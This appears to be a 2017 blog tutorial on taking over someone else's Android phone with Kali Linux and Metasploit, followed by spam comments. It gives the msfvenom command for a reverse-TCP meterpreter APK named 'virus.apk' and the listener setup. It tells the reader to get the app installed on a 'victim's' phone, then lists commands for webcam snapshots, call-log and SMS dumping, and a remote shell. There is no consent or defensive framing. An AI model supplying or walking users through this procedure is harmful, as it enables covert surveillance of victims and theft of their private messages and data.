Saturday 28 January 2017

How to Hack an Android phone using Kali Linux

Posted by Unknown
As promised, I am here today to publish new post about how to hack an android phone remotely using Metasploit in Kali Linux. We have already learnt about the basics of metasploit in previous tutorial.


Using this method you can hack an android phone with just an app. We will use metasploit framework for this task which is already installed in Kali Linux. I recommend you download and install Kali Linux before moving to the process.


how to hack and android phone


An Intro

We will use a reverse tcp payload to get connection back from victim’s smartphone to our pc. Payload will be in standalone android apk executable format which you need to deliver and install in victim’s phone. This method will work for all android phones having android version 4.4 or higher.

Requirements

For our this task to be completed, we need following things.

Kali Linux

Internet Connection with good speed (For hacking over WAN)

Port Forwarding (For WAN)

Some Patience

OK, Now lets start.

How to Hack Website


Process

Step 1:- Boot in your Kali Linux and open Terminal.

Step 2:- Type ifconfig and make a note of your IP Address. This is your Private IP Address. We will use this if you and your victim are on same LAN connection. But if you want to hack your victims phone which is outside your LAN or say if you want to hack over WAN then you need your Public IP Address.

To get your Public IP Address, Go to whatismyip.com and make a note of your IP Address.

★ Command Prompt Tips Tricks

Step 3:- Go back to terminal and type following command to generate standalone android meterpreter payload. In below command, replace your_ip with your ip address.

 msfvenom -p android/meterpreter/reverse_tcp lhost=your_ip lport=4444 -o /root/virus.apk

Lets understand this command

generate payload using msfvenom


msfvenom - It is name of tool of Metasploit Framework used to generate payloads.
-p - It is specifying that we want to make a payload.
android/meterpreter/reverse_tcp - It is name of reverse tcp meterpreter android payload to hack android phones.
lhost= - It is used to specify the listening host for payload or where payload will send reverse tcp connection. It contains attacker’s (yours) ip address.
lport - To specify listening port on attackers system. I am setting it to 4444.
-o - It is used to specify the output path for executable payload.
/root/virus.apk - It is name and path of file along with .apk format.

After entering this command, you need to deliver and install this payload in your victim’s smartphone.
Step 4:- Use below commands in terminal one by one to setup the listener.

msfconsole - Name of tool.

use exploit/multi/handler - Setting up exploit handler to manage and listen for connection.

set lhost your_ip - Set up listening host. Replace your_ip with the ip address you used while making payload.

set lport 4444 - Set up listening port.

exploit handler set up


Step 5:- After setting up all those things, type run or exploit and hit enter to start our listener.

exploit handler listening



Step 6:- When your victim install and click on your app, you will get connection and session id like this.

got session metasploit


Now that you got session, You can execute any command in your victims phone remotely using this meterpreter payload.

To see the list of available commands, type ? and press enter.

Here is a small list of some commands and their action.

★ Bypass Android Lock Screen using this Simple Trick

webcam_snap - To get snapshot from victims camera.
dump_calllog - To get list of all Call Logs and Call History.
dump_sms - To get all messages.
shell - To get remote shell.

Now you can hack an android phone remotely using Kali Linux and Metasploit.
Share it with your friends.
Happy Hacking Friends.

★ How To Change IMEI Number

2 comments:

  1. excellent blog i also enjoy to read it, great information. Thanks to share with us.mobikwik promo code

    ReplyDelete


  2. This is very attention-grabbing, You're an excessively skilled blogger.
    I've joined your rss feed.

    Howdy, I read your blog
    you get a lot of spam responses? If you stop
    it, any plugin or anything you can recommend? I am so much so
    very much appreciated.

    Thank you for sharing!
    Love this post!
    Wonderful tips, sir, I appreciate your help.
    Great information. Love the web info. Thanks.

    Mobile Legends MOD Apk

    [url=https://apkdynasty.com/mobile-legends-mod-apk/]Mobile Legends MOD Apk[/url]

    ReplyDelete